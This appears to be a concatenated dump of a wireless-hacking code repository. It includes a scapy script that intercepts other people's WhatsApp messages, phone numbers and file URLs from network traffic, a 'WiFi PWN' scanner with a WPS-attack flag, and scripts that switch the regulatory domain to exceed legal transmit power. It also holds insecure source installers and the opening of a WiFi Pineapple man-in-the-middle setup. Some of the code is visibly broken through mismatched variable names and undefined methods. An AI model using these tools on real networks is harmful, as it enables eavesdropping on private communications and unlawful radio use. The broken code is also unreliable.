| while True: 15 | pkt = rawSocket.recvfrom(2048)[0] 16 | if pkt[26] == "\x80": 17 | if pkt[36:42] not in ap_list and ord(pkt[63]) > 0: 18 | ap_list.add(pkt[36:42]) 19 | print("SSID: %s AP MAC: %s" % (pkt[64:64 +ord(pkt[63])], pkt[36:42].encode('hex'))) 20 | 21 | if __name__ == '__main__': 22 | if len(sys.argv) == 1: 23 | print('Usage:\nsudo ./rawsock.py mon0') 24 | sys.exit(-1) 25 | 26 | sniff_raw_socket(sys.argv[1]) -------------------------------------------------------------------------------- /sniff/whatsapp-sniff.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import os 3 | import sys 4 | from scapy.all import * 5 | import re 6 | 7 | PreviousMsg = "" 8 | PreviousFilename = "" 9 | Files = [] 10 | Messages = [] 11 | Urls = [] 12 | 13 | def banner(): 14 | print "#########################" 15 | print "## whatsapp sniff v0.1 ##" 16 | print "## qnix@0x80.org ##" 17 | print "#########################\n" 18 | 19 | def whatsapp_parse(packet): 20 | global Previous_Msg 21 | global Previous_Filename 22 | global Files 23 | global Messages 24 | global Urls 25 | src = packet.sprintf("%IP.src%") 26 | dst = packet.sprintf("%IP.dst%") 27 | sport = packet.sprintf("%IP.sport%") 28 | dport = packet.sprintf("%IP.dport%") 29 | raw = packet.sprintf("%Raw.load%") 30 | 31 | # Target Sending stuff 32 | if dport == "5222": 33 | Filename = "" 34 | toNumber = "" 35 | Url = "" 36 | Msg = "" 37 | try: 38 | toNumber = re.sub("\D", "", raw) 39 | if toNumber[5:16].startswith("0"): 40 | toNumber = toNumber[6:17] 41 | else: 42 | toNumber = toNumber[5:16] 43 | try: 44 | Filename = raw.split("file\\xfc")[1][1:37] 45 | Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:] 46 | except:pass 47 | 48 | try: 49 | Msg = raw.split("\\xf8\\x02\\x16\\xfc")[1][4:-1].decode("string_escape") 50 | except: 51 | pass 52 | except: pass 53 | if(len(toNumber) >= 10): 54 | if len(Msg) >= 1 and Previous_Msg != Msg: 55 | Previous_Msg = Msg 56 | print "To : ", toNumber 57 | print "Msg : ", Msg 58 | Messages.append(Msg) 59 | elif(len(Filename) >= 1 and Previous_Filename != Filename): 60 | Previous_Filename = Filename 61 | print "To : ", toNumber 62 | print "Filename : ", Filename 63 | print "URL : ", Url 64 | Files.append(Filename) 65 | Urls.append(Url) 66 | 67 | # Recieved Messages 68 | if sport == "5222": 69 | Msg = "" 70 | fromNumber = "" 71 | Url = "" 72 | Filename = "" 73 | try: 74 | fromNumber = re.sub("\D", "", raw) 75 | if(fromNumber[5:16].startswith("0")): fromNumber = fromNumber[6:17] 76 | else: fromNumber = fromNumber[5:16] 77 | try: 78 | Filename = raw.split("file\\xfc")[1][1:37] 79 | Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:] 80 | except: pass 81 | try: Msg = raw.split("\\x02\\x16\\xfc")[1][4:-1].decode("string_escape") 82 | except: pass 83 | except: 84 | pass 85 | if len(fromNumber) == 1 and Previous_Msg != Msg: 86 | Previous_Msg = Msg 87 | print "From : ", fromNumber 88 | print "Msg : ", Msg 89 | Messages.append(Msg) 90 | elif len(Filename) >= 1 and Previous_Filename != Filename: 91 | Previous_Filename = Filename 92 | print "From : ", fromNumber 93 | print "Filename : ", Filename 94 | print "URL : ", Url 95 | Files.append(Filename) 96 | Urls.append(Url) 97 | 98 | def callback(packet): 99 | sport = packet.sprintf("%IP.sport%") 100 | dport = packet.sprintf("%IP.dport%") 101 | raw = packet.sprintf("%Raw.load%") 102 | if raw != '??': 103 | if dport == "5222" or sport == "5222": 104 | whatsapp_parse(packet) 105 | 106 | def main(): 107 | banner() 108 | if len(sys.argv) != 2: 109 | print "%s " % sys.argv[0] 110 | sys.exit(1) 111 | 112 | iface = sys.argv[1] 113 | verb = 0 114 | promisc = 0 115 | expr = "tcp port 5222" 116 | 117 | print("[+] Interface : ", iface) 118 | print("[+] filter : ", expr) 119 | sniff(filter=expr, prn=callback, store=0) 120 | # print "[+] iface %s" % scapy.iface 121 | if __name__ == "__main__": 122 | main() -------------------------------------------------------------------------------- /sniff/wifilog.py: -------------------------------------------------------------------------------- 1 | __author__ = 'root' 2 | -------------------------------------------------------------------------------- /sniff/wifiz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # -*- coding: utf-8 -*- 3 | # 802.11 sniffer/wpsig/wpspin/reaver 4 | # Credits go to: 5 | # 6 | # Craig Heffner Tactical Network Solutions 7 | # https://github.com/devttys0/wps 8 | # 9 | # WPSIG [ablanco@coresecurity.com, oss@coresecurity.com] 10 | 11 | from sys import argv, exit 12 | from os import path, geteuid 13 | 14 | # import logging 15 | # logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 16 | # from scapy.all import conf 17 | # conf.verb = 1 18 | # conf.use_pcap = True 19 | # conf.use_dnet = False 20 | 21 | from scapy.layers.dot11 import * 22 | from scapy.all import * 23 | 24 | 25 | # impacket 26 | try: 27 | from impacket import dot11 28 | from impacket.dot11 import Dot11 29 | from impacket.dot11 import Dot11Types 30 | from impacket.dot11 import Dot11ManagementFrame 31 | from impacket.dot11 import Dot11ManagementProbeRequest 32 | from impacket.ImpactDecoder import RadioTapDecoder 33 | except ImportError: 34 | Exception("impacket") 35 | 36 | from pprint import pprint 37 | from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter 38 | 39 | 40 | if LINUX: 41 | # print('Linux detected. Trying to import PyLorcon2...') 42 | try: 43 | import PyLorcon2 44 | except ImportError: 45 | logging.warning('PyLorcon2 import failed. Injection is not available.') 46 | 47 | if WINDOWS: 48 | logging.error('Sorry, no Windows.') 49 | exit(-1) 50 | 51 | if DARWIN: 52 | logging.warning('OS X detected. Only pasive mode will be available') 53 | 54 | #TODO: add iOS and Android detection 55 | 56 | 57 | 58 | PROBE_REQUEST_TYPE = 0 59 | PROBE_REQUEST_SUBTYPE = 4 60 | 61 | 62 | class WiFiWizard(object): 63 | 64 | 65 | def __init__(self, iface, output=None, whitelist=None, verbose=False): 66 | # Replace this with your phone's MAC address 67 | if not whitelist: whitelist = ['00:00:00:00:00:00', ] 68 | self.iface = iface 69 | self.whitelist = whitelist 70 | self.verbose = verbose 71 | self.aps = {} 72 | self.clients = {} 73 | 74 | # Probe requests from clients 75 | def handle_probe(self, pkt): 76 | if pkt.haslayer(Dot11ProbeReq) and '\x00' not in pkt[Dot11ProbeReq].info: 77 | essid = pkt[Dot11ProbeReq].info 78 | else: 79 | essid = 'Hidden SSID' 80 | client = pkt[Dot11].addr2 81 | 82 | if client in self.whitelist or essid in self.whitelist: 83 | #TODO: add logging 84 | return 85 | 86 | # New client 87 | if client not in self.clients: 88 | self.clients[client] = [] 89 | print('[!] New client: %s ' % client) 90 | 91 | if essid not in self.clients[client]: 92 | self.clients[client].append(essid) 93 | print('[+] New ProbeRequest: from %s to %s' % (client, essid)) 94 | 95 | def handle_beacon(self, pkt): 96 | 97 | if not pkt.haslayer(Dot11Elt): 98 | return 99 | 100 | # Check to see if it's a hidden SSID 101 | essid = pkt[Dot11Elt].info if '\x00' not in pkt[Dot11Elt].info and pkt[Dot11Elt].info != '' else 'Hidden SSID' 102 | bssid = pkt[Dot11].addr3 103 | client = pkt[Dot11].addr2 104 | 105 | if client in self.whitelist or essid in self.whitelist or bssid in self.whitelist: 106 | #TODO: add logging 107 | return 108 | 109 | try: 110 | channel = int(ord(pkt[Dot11Elt:3].info)) 111 | except: 112 | channel = 0 113 | 114 | try: 115 | extra = pkt.notdecoded 116 | rssi = -(256-ord(extra[-4:-3])) 117 | except: 118 | rssi = -100 119 | 120 | p = pkt[Dot11Elt] 121 | capability = pkt.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}" 122 | "{Dot11ProbeResp:%Dot11ProbeResp.cap%}").split('+') 123 | # print('capability = %s' % capability) 124 | 125 | crypto = set() 126 | while isinstance(p, Dot11Elt): 127 | if p.ID == 48: 128 | crypto.add("WPA2") 129 | elif p.ID == 221 and p.info.startswith('\x00P\xf2\x01\x01\x00'): 130 | crypto.add("WPA") 131 | p = p.payload 132 | 133 | if not crypto: 134 | if 'privacy' in capability: 135 | crypto.add("WEP") 136 | else: 137 | crypto.add("OPN") 138 | 139 | enc = '/'.join(crypto) 140 | if bssid not in self.aps: 141 | self.aps[bssid] = (channel, essid, bssid, enc, rssi) 142 | print "[+] New AP {0:5}\t{1:20}\t{2:20}\t{3:5}\t{4:4}".format(channel, essid, bssid, enc, rssi) 143 | 144 | 145 | def pkt_handler(self, pkt): 146 | # wlan.fc.type == 0 Management frames 147 | # wlan.fc.type == 1 Control frames 148 | # wlan.fc.type == 2 Data frames 149 | # wlan.fc.type_subtype == 0 Association request 150 | # wlan.fc.type_subtype == 1 Association response 151 | # wlan.fc.type_subtype == 2 Reassociation request 152 | # wlan.fc.type_subtype == 3 Reassociation response 153 | # wlan.fc.type_subtype == 4 Probe request 154 | # wlan.fc.type_subtype == 5 Probe response 155 | # wlan.fc.type_subtype == 8 Beacon 156 | 157 | 158 | try: 159 | print('-->', pkt.name) 160 | except: 161 | pass 162 | 163 | #Beacon 164 | if pkt.haslayer(Dot11Beacon): 165 | self.handle_beacon(pkt) 166 | 167 | # Client ProbeReq 168 | if pkt.haslayer(Dot11ProbeReq): 169 | self.handle_request(pkt) 170 | 171 | # if pkt.type == PROBE_REQUEST_TYPE and pkt.subtype == PROBE_REQUEST_SUBTYPE: 172 | 173 | if pkt.haslayer(Dot11ProbeResp): 174 | self.handle_response(pkt) 175 | 176 | 177 | 178 | def sniff(self): 179 | ''' 180 | Sniff Beacon and Probe Requst/Response frames to extract AP info 181 | :param count: packets to capture, 0 = loop 182 | :return: 183 | ''' 184 | print('Press Ctrl-C to stop sniffing.') 185 | sniff(iface=self.iface, 186 | prn=self.pkt_handler, 187 | lfilter=lambda p: p.haslayer(Dot11)) 188 | 189 | if __name__ == '__main__': 190 | parser = ArgumentParser(description='WiFi PWN T00L', formatter_class=ArgumentDefaultsHelpFormatter) 191 | parser.add_argument('--version', action='version', version='%(prog)s 1.0') 192 | parser.add_argument('interface', help='802.11 interface to use') 193 | parser.add_argument('-c', '--channel', required=False) 194 | parser.add_argument('-w', '--wps', required=False, action='store_true', help='wps hack') 195 | parser.add_argument('-a', '--active', required=False, action='store_true', help='active mode') 196 | 197 | args = parser.parse_args() 198 | 199 | if geteuid() != 0: 200 | exit("You need to have root privileges to run this script.\nPlease try again, this time using 'sudo'.") 201 | 202 | WiFiWizard(args.interface).sniff() 203 | 204 | -------------------------------------------------------------------------------- /theremin.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # Based on http://midnightresearch.com/local/hackery/wifi-theremin.py 3 | # 4 | # Create a pseudo-theremin from your wifi device 5 | # 6 | # The frequency of the tone is inversely proportional to the signal strength of the AP 7 | # that you are connected to. If specified, the Volume is proportional to the 8 | # signal strength of the second card. You must be associated to an AP for it to 9 | # work. 10 | # 11 | # Requires pyaudio (which requires portaudio) apt-get install libportaudio2 python-support 12 | # wget http://people.csail.mit.edu/hubert/pyaudio/packages/python-pyaudio_0.2.3_i386.deb 13 | # See here for details: http://people.csail.mit.edu/hubert/pyaudio/ 14 | # 15 | # Works on linux and OSX, tested on Kali Linux 1.0.8, and Max OS X 10.9.5 respectively 16 | # 17 | # Aaron Peterson -- aaron@midnightresearch.com 18 | # @090h http://twitter.com/090h 19 | # 20 | # Requerements: 21 | # apt-get install libportaudio2 22 | # apt-get install python-pyaudio 23 | # 24 | 25 | from sys import exit, platform, argv 26 | from threading import Thread, Event 27 | from os import popen, path 28 | from math import pi, sin 29 | from signal import signal, SIGINT 30 | from struct import pack 31 | from random import randrange 32 | from time import sleep, time 33 | 34 | 35 | try: 36 | import pyaudio 37 | except ImportError: 38 | print(" [!] Need pyaudio from http://people.csail.mit.edu/hubert/pyaudio/") 39 | print(" 'easy_install pyaudio' may work, but it also depends on PortAudio") 40 | exit(1) 41 | 42 | 43 | class Tone(Thread): 44 | """ This module just emits a tone based on the frequency/volume that it's set to""" 45 | 46 | def __init__(self, id=None, freq=1000): 47 | Thread.__init__(self) 48 | self.id = id 49 | self.freq = freq 50 | self.stop = Event() 51 | 52 | # #################################################### 53 | # Constants that come from the pyAudio sample scripts 54 | # Short int audio format 55 | self.WIDTH = 2 56 | self.CHANNELS = 2 57 | self.RATE = 44100 58 | # Signed short range 59 | self.maxVolume = 10000 60 | ###################################################### 61 | 62 | self.volume = 10000 63 | signal(SIGINT, self.sigHandler) 64 | self.p = pyaudio.PyAudio() 65 | self.stream = self.p.open(format=self.p.get_format_from_width(self.WIDTH), 66 | channels=self.CHANNELS, 67 | rate=self.RATE, 68 | output=True) 69 | 70 | def run(self): 71 | print " [*] Starting up toner" 72 | self.doTone() 73 | 74 | def doTone(self): 75 | i = 0 76 | while True: 77 | i += 1 78 | # Taken from pyaudio sample scripts 79 | phase = i * 2 * pi * self.freq / self.RATE 80 | # compute sin value 81 | sample = self.volume * sin(phase) 82 | # convert to short int 83 | data = pack('h', sample) 84 | for c in range(self.CHANNELS): 85 | # write one sample to each channel 86 | self.stream.write(data, 1) 87 | 88 | def cleanUp(self): 89 | print(" [*] Stopping toner...") 90 | self.stream.stop_stream() 91 | self.stream.close() 92 | self.p.terminate() 93 | print(" [*] Toner Done.") 94 | exit(1) 95 | 96 | def sigHandler(self, signum, stackframe): 97 | self.cleanUp() 98 | 99 | 100 | class WifiTheremin(): 101 | def __init__(self, pitchDevice=None, volumeDevice=None, toner=None): 102 | # The range of frequencies we'll use 103 | self.lowFreq = 300 104 | self.highFreq = 8000 105 | # The range of signal values (for pitch), they will expand as higher/lower values are seen 106 | self.lowPitchSignal = None 107 | self.highPitchSignal = None 108 | # The range of signal values for volume 109 | self.lowVolumeSignal = None 110 | self.highVolumeSignal = None 111 | self.pitchDevice = pitchDevice 112 | self.volumeDevice = volumeDevice 113 | self.toner = toner 114 | 115 | # To smooth things out we'll sample and interpolate the sound results over some 116 | # period. Would sound better if we did something more inteligent, but this 117 | # will do for now. 118 | self.interpolateCycle = 0.5 119 | # How much to sleep between freq changes... it gets too noisy if it's too 120 | # short, but to choppy if it's too long. But baby bear's porridge is *just* right. 121 | self.sleepCycle = 0.03 122 | 123 | def getSignal(self, device): 124 | """Gets the signal strength of the selected wifi intereface.""" 125 | signal = 0 126 | # In theory we could just replace the get*Signal function to support other systems 127 | if device == "test": 128 | # This is just for testing the sound device, etc. 129 | signal = self.getFakeSignal() 130 | elif platform == "darwin": 131 | signal = self.getOsxSignal(device) 132 | elif platform == "linux2": 133 | signal = self.getLinuxSignal(device) 134 | else: 135 | print(" [!] Unsupported platform [%s]" % platform) 136 | exit(1) 137 | 138 | if signal == "": 139 | print(" [!] Not getting a valid signal for [%s], you might need to associate to an AP..." % device) 140 | exit(1) 141 | 142 | print " [*] Signal strength [%s] [%s]" % (signal, device) 143 | return signal 144 | 145 | def getOsxSignal(self, device): 146 | """Gets signal strength for wifi under OSX""" 147 | # Let me know if you know a better way to get this information... 148 | airport = "/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport" 149 | cmd = "%s -I | grep agrCtlRSSI | awk '{ print $2 }'" % airport 150 | try: 151 | return popen(cmd, "r").readline().rstrip() 152 | except IOError: 153 | print " [!] Problem executing [%s] to get signal" % cmd 154 | print " You should be connected to an access point to get signal strength" 155 | exit(1) 156 | 157 | 158 | def getLinuxSignal(self, device): 159 | """Gets signal strength for wifi under Linux""" 160 | if path.exists('/sbin/iw'): 161 | cmd = "iwlist %s scan | grep 'Signal level'" % device 162 | else: 163 | cmd = "iwconfig %s | grep 'Signal level'" % device 164 | 165 | try: 166 | return popen(cmd, "r").readline().split('=')[-1].split(' ')[0].rstrip() 167 | except: 168 | print(" [!] Problem running [%s] to get signal" % cmd) 169 | print(" You should be connected to an access point to get signal strength") 170 | exit(1) 171 | 172 | def getFrequency(self): 173 | """This will get the frequency based on the current signal strength and 174 | the range of observed signal ranges. It doesn't handle any ramp up. 175 | The Higher the signal strength, the lower the pitch""" 176 | signal = float(self.getSignal(self.pitchDevice)) 177 | freq = self.lowFreq 178 | # Adjust the min/max ranges 179 | if not self.lowPitchSignal or signal < self.lowPitchSignal: self.lowPitchSignal = signal 180 | if not self.highPitchSignal or signal > self.highPitchSignal: self.highPitchSignal = signal 181 | # Set the freq based on a ratio against the max ranges 182 | freqRange = self.highFreq - self.lowFreq 183 | signalRange = self.highPitchSignal - self.lowPitchSignal 184 | adjSignal = signal - self.lowPitchSignal 185 | if signalRange == 0 or adjSignal == 0: return self.lowFreq 186 | freq = self.lowFreq + ((1 - (adjSignal / signalRange)) * freqRange) 187 | return freq 188 | 189 | def getFakeSignal(self): 190 | """Fake signal for testing sound, etc.""" 191 | return randrange(1, 100) 192 | 193 | def getVolume(self): 194 | """Return the absolute volume we want to be at based on the signal strength 195 | The higher the signal strength, the higher the volume""" 196 | signal = float(self.getSignal(self.volumeDevice)) 197 | volume = self.toner.maxVolume 198 | # adjust the min/max ranges 199 | if not self.lowVolumeSignal or signal < self.lowVolumeSignal: self.lowVolumeSignal = signal 200 | if not self.highVolumeSignal or signal > self.highVolumeSignal: self.highVolumeSignal = signal 201 | # Some redundant code here, but oh well 202 | signalRange = self.highVolumeSignal - self.lowVolumeSignal 203 | adjSignal = signal - self.lowVolumeSignal 204 | if signalRange == 0 or adjSignal == 0: return self.toner.maxVolume 205 | volume = (adjSignal / signalRange) * self.toner.maxVolume 206 | return volume 207 | 208 | def run(self): 209 | print " [*] Starting up theremin" 210 | startFreq = self.lowFreq 211 | while True: 212 | nextFreq = self.getFrequency() 213 | cycleStartTime = time() 214 | if self.volumeDevice: 215 | self.toner.volume = self.getVolume() 216 | # Ramp up the frequency over the length of the cycle so the sound isn't too jumpy 217 | while time() - cycleStartTime < self.interpolateCycle: 218 | # Get the signal based on the interpolated values 219 | self.toner.freq = startFreq + ( 220 | ((time() - cycleStartTime) / self.interpolateCycle) * (nextFreq - startFreq)) 221 | startFreq = self.toner.freq 222 | sleep(self.sleepCycle) 223 | 224 | 225 | if __name__ == "__main__": 226 | if len(argv) < 2: 227 | print("") 228 | print(" usage: %s []" % argv[0]) 229 | print("") 230 | print(" Note: Specifying 'test' as the wifi device (for pitch or volume) will") 231 | print(" test the sound with random ranges. Volume device is not required.") 232 | print("") 233 | exit(1) 234 | 235 | # Devices 236 | pitchDevice = argv[1] 237 | volumeDevice = argv[2] if len(argv) == 3 else None 238 | 239 | tone = Tone(id=1) 240 | # Start new thread for toner 241 | tone.start() 242 | wt = WifiTheremin(pitchDevice=pitchDevice, volumeDevice=volumeDevice, toner=tone) 243 | wt.run() 244 | # Wait for thread to finish 245 | tone.join() 246 | print(" [*] Wifi Theremin Finished.") 247 | 248 | -------------------------------------------------------------------------------- /tweaks/bt5_easy_install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | GNOME_MENU_ENTRY="/usr/share/applications/backtrack-eapeak.desktop" 4 | 5 | echo "Installing Mercurial..." 6 | apt-get -y install mercurial 2>&1 > /dev/null 7 | 8 | echo "Installing Dependency M2Crypto..." 9 | apt-get -y install m2crypto 2>&1 > /dev/null 10 | 11 | echo "Installing Dependency Argparse..." 12 | hg clone http://code.google.com/p/argparse 2>&1 > /dev/null 13 | cd argparse 14 | python setup.py build 2>&1 > /dev/null 15 | python setup.py install 2>&1 > /dev/null 16 | cd .. 17 | rm -rf argparse 18 | 19 | echo "Replacing Scapy with the Community Edition..." 20 | if [ -f "/usr/bin/scapy" ]; then 21 | rm /usr/bin/scapy 2>&1 > /dev/null 22 | fi 23 | if [ -d "/usr/lib/pymodules/python2.6/scapy" ]; then 24 | rm -rf /usr/lib/pymodules/python2.6/scapy 2>&1 > /dev/null 25 | fi 26 | hg clone http://hg.secdev.org/scapy-com 2>&1 > /dev/null 27 | cd scapy-com 28 | python setup.py build 2>&1 > /dev/null 29 | python setup.py install 2>&1 > /dev/null 30 | cd .. 31 | rm -rf scapy-com 32 | 33 | echo "Installing EAPEAK..." 34 | if [ -d "/pentest/wireless/eapeak" ]; then 35 | rm -rf /pentest/wireless/eapeak 2>&1 > /dev/null 36 | fi 37 | hg clone http://code.google.com/p/eapeak /pentest/wireless/eapeak 2>&1 > /dev/null 38 | pushd /pentest/wireless/eapeak 2>&1 > /dev/null 39 | python setup.py build 2>&1 > /dev/null 40 | python setup.py install 2>&1 > /dev/null 41 | rm -rf build 42 | popd 2>&1 > /dev/null 43 | 44 | echo "[Desktop Entry]" > $GNOME_MENU_ENTRY 45 | echo "Name=eapeak" >> $GNOME_MENU_ENTRY 46 | echo "Encoding=UTF-8" >> $GNOME_MENU_ENTRY 47 | echo "Exec=sh -c \"cd /pentest/wireless/eapeak ;eapeak;sudo -s\"" >> $GNOME_MENU_ENTRY 48 | echo "Icon=btmenu.png" >> $GNOME_MENU_ENTRY 49 | echo "StartupNotify=false" >> $GNOME_MENU_ENTRY 50 | echo "Terminal=true" >> $GNOME_MENU_ENTRY 51 | echo "Type=Application" >> $GNOME_MENU_ENTRY 52 | echo "Categories=bt-network-analysis-wireless-lan;" >> $GNOME_MENU_ENTRY 53 | 54 | if [ -f "/usr/share/applications/desktop.en_US.utf8.cache" ]; then 55 | rm /usr/share/applications/desktop.en_US.utf8.cache 2>&1 > /dev/null 56 | fi 57 | killall gnome-panel 2>&1 > /dev/null 58 | 59 | echo "Done." 60 | -------------------------------------------------------------------------------- /tweaks/install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | #TODO: test it! 3 | 4 | print_status(){ 5 | echo -e "\x1B[01;34m[*]\x1B[0m $1" 6 | } 7 | 8 | ask(){ 9 | while true; do 10 | if [ "${2:-}" = "Y" ]; then 11 | prompt="Y/n" 12 | default=Y 13 | elif [ "${2:-}" = "N" ]; then 14 | prompt="y/N" 15 | default=N 16 | else 17 | prompt="y/n" 18 | default= 19 | fi 20 | 21 | read -p "$1 [$prompt] " REPLY 22 | if [ -z "$REPLY" ]; then 23 | REPLY=$default 24 | fi 25 | 26 | case "$REPLY" in 27 | Y*|y*) return 0 ;; 28 | N*|n*) return 1 ;; 29 | esac 30 | done 31 | } 32 | 33 | pause(){ 34 | read -sn 1 -p "Press any key to continue..." 35 | } 36 | 37 | check_euid(){ 38 | print_status "Checking for root privs." 39 | if [[ $EUID -ne 0 ]]; then 40 | print_error "This script must be ran with sudo or root privileges, or this isn't going to work." 41 | exit 1 42 | else 43 | print_good "w00t w00t we are root!" 44 | fi 45 | } 46 | 47 | 48 | # apt-get install wireless-tools 49 | apt-get install linux-headers-$(uname -r) build-essential make patch subversion openssl libssl-dev zlib1g zlib1g-dev libssh2-1-dev libnl1 libnl-dev gettext autoconf tcl8.5 libpcap0.8 libpcap0.8-dev python-scapy python-dev cracklib-runtime macchanger-gtk tshark ethtool iw 50 | 51 | 52 | if ask "Install horst?" Y; then 53 | git clone git://br1.einfach.org/horst /tmp/horst 54 | cd /tmp/horst 55 | make 56 | cp horst /usr/bin 57 | cd /tmp 58 | rm -rf horst 59 | fi 60 | 61 | # GNU Radio 802.11 62 | # An IEEE 802.11 a/g/p Transceiver http://www.ccs-labs.org/projects/wime/ 63 | # git clone https://github.com/bastibl/gr-ieee802-11 64 | 65 | if ask "Install scapy?" Y; then 66 | print_status "Installing Scapy dependencies" 67 | apt-get install tcpdump graphviz imagemagick python-gnuplot python-crypto python-pyx wireshark -y 68 | 69 | #pip install -e hg+https://bb.secdev.org/scapy#egg=scapy --insecure 70 | cd /tmp 71 | hg clone https://bb.secdev.org/scapy --insecure 72 | cd scapy 73 | ./setup.py install 74 | 75 | #Cleanup 76 | cd .. 77 | rm -rf scapy/* 78 | rm -rf scapy/.hg* 79 | rmdir scapy 80 | fi 81 | 82 | if ask "Install scapytain?" N; then 83 | apt-get install -y python-cherrypy3 graphviz python-genshi python-sqlobject python-formencode python-pyopenssl highlight python-trml2pdf python-pip 84 | # pip install http://www.satchmoproject.com/snapshots/trml2pdf-1.2.tar.gz 85 | pip install pyopenssl 86 | 87 | #pip install -e hg+ --insecure 88 | # udo pip install -e hg+http://bb.secdev.org/scapytain#egg=scapytain --insecure 89 | cd /tmp 90 | hg clone https://bb.secdev.org/scapytain --insecure 91 | cd scapytain 92 | ./setup.py install 93 | 94 | mcedit /etc/scapytainrc 95 | mkdir /var/lib/scapytain 96 | scapytain_dbutil -c 97 | 98 | #Cleanup 99 | cd /tmp 100 | rm -rf scapytain/* 101 | rm -rf scapytain/.hg* 102 | rmdir scapytain 103 | fi 104 | 105 | # Latest version of Pylorcon2 https://github.com/tom5760/pylorcon2 106 | if ask "Install Lorcon?" Y; then 107 | print_status "Installing Lorcon dependecies" 108 | apt-get install libpcap0.8-dev libnl-dev 109 | 110 | #Requires lorcon 111 | print_status "Installing Lorcon" 112 | cd /usr/src 113 | git clone https://code.google.com/p/lorcon 114 | cd lorcon 115 | ./configure 116 | make && make install 117 | 118 | # install pylorcon2 119 | print_status "Install pylorcon2" 120 | cd /usr/src 121 | svn checkout http://pylorcon2.googlecode.com/svn/trunk/ pylorcon2 122 | cd pylorcon2 123 | python setup.py build 124 | python setup.py install 125 | fi 126 | 127 | if ask "Install aircrack-nf from source?" Y; then 128 | cd /tmp 129 | git clone https://github.com/aircrack-ng/aircrack-ng 130 | cd /tmp/aircrack-ng 131 | #wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch 132 | #patch -p1 < channel-negative-one-maxim.patch 133 | make 134 | make install 135 | cd scripts/airgraph-ng 136 | python setup.py install 137 | #ln -s /usr/local/bin/airgraph-ng /usr/share/airgraph-ng 138 | mkdir /usr/share/airgraph-ng 139 | fi 140 | -------------------------------------------------------------------------------- /tweaks/nolimits.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | card=$1 4 | 5 | #1st Method. 6 | iw reg set BO 7 | iwconfig $card txpower 30 8 | 9 | #2nd Method. 10 | ifconfig $card down 11 | iw reg set BO 12 | ifconfig $card up 13 | iwconfig $card channel 13 14 | iwconfig $card txpower 30 15 | -------------------------------------------------------------------------------- /tweaks/power_tweak.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # 13 channel 4 | ifconfig wlan0 down 5 | iw wlan0 reg set BO 6 | ifconfig wlan0 up 7 | iwconfig wlan0 channel 13 8 | 9 | # Power1 10 | ifconfig wlan0 down 11 | iw reg set BO 12 | iwconfig wlan0 txpower 500mW 13 | 14 | # Power2 15 | iwconfig wlan0 txpower 30 16 | ifconfig wlan0 up 17 | -------------------------------------------------------------------------------- /tweaks/tuneup.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | #To configure a WiFi interface for sniffing, use the following (traditional) commands: 4 | #ifconfig wlan0 down 5 | #iwconfig wlan0 mode monitor 6 | #iwconfig wlan0 channel 6 7 | #ifconfig wlan0 up 8 | 9 | #or alternatively the newer ones: 10 | #ip link set wlan0 down 11 | #iw dev wlan0 set type monitor 12 | #ip link set wlan0 up 13 | #iw dev wlan0 set channel 6 14 | 15 | iface="mon0" 16 | channel=$1 17 | bssid=$2 18 | #bssid="c0:4a:00:6e:d8:fa" 19 | #channel=11 20 | 21 | #http://www.embeddedcircle.com/wi-fi-filter-for-wireshark/ 22 | 23 | iwconfig ${iface} channel ${channel} 24 | #tshark -R "wlan.fc.type_subtype eq 8 and wlan.bssid eq ${bssid}" -i ${iface} \ 25 | # -T fields -e wlan.bssid -e radiotap.datarate -e radiotap.antenna -e radiotap.dbm_antsignal -e radiotap.datarate 26 | 27 | tshark -i ${iface} -T fields -E header=y -np \ 28 | -e frame.time_relative -e wlan_mgt.ssid -e wlan.bssid -e wlan.seq -e radiotap.dbm_antsignal \ 29 | -e radiotap.antenna -e radiotap.datarate -e radiotap.dbm_antnoise \ 30 | -Y "wlan.fc.type_subtype == 8 and wlan.bssid == ${bssid}" 31 | 32 | -------------------------------------------------------------------------------- /wp4.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #define variables 3 | 4 | echo "$(tput setaf 1) _ ___ _______ ____ _ __ " 5 | echo " | | / (_) ____(_) / __ \\(_)___ ___ ____ _____ ____ / /__ " 6 | echo " | | /| / / / /_ / / / /_/ / / __ \/ _ \/ __ '/ __ \/ __ \/ / _ \\" 7 | echo " | |/ |/ / / __/ / / / ____/ / / / / __/ /_/ / /_/ / /_/ / / __/" 8 | echo " |__/|__/_/_/ /_/ /_/ /_/_/ /_/\___/\__,_/ .___/ .___/_/\___/ " 9 | echo " $(tput sgr0) OWN the Network $(tput setaf 1)/_/ /_/$(tput sgr0) v2.1" 10 | echo "" 11 | 12 | echo -n "Pineapple Netmask [255.255.255.0]: " 13 | read pineapplenetmask 14 | if [[ $pineapplenetmask == '' ]]; then 15 | pineapplenetmask=255.255.255.0 #Default netmask for /24 network 16 | fi 17 | 18 | echo -n "Pineapple Network [172.16.42.0/24]: " 19 | read pineapplenet 20 | if [[ $pineapplenet == '' ]]; then 21 | pineapplenet=172.16.42.0/24 # Pineapple network. Default is 172.16.42.0/24 22 | fi 23 | 24 | echo -n "Interface between PC and Pineapple [eth0]: " 25 | read pineapplelan 26 | if [[ $pineapplelan == '' ]]; then 27 | pineapplelan=eth0 # Interface of ethernet cable directly connected to Pineapple 28 | fi 29 | 30 | echo -n "Interface between PC and Internet [wlan0]: " 31 | read pineapplewan 32 | if [[ $pineapplewan == '' ]]; then 33 | pineapplewan=wlan0 #i.e. wlan0 for wifi, ppp0 for 3g modem/dialup, eth0 for lan 34 | fi 35 | 36 | temppineapplegw=`netstat -nr | awk 'BEGIN {while ($3!="0.0.0.0") getline; print $2}'` 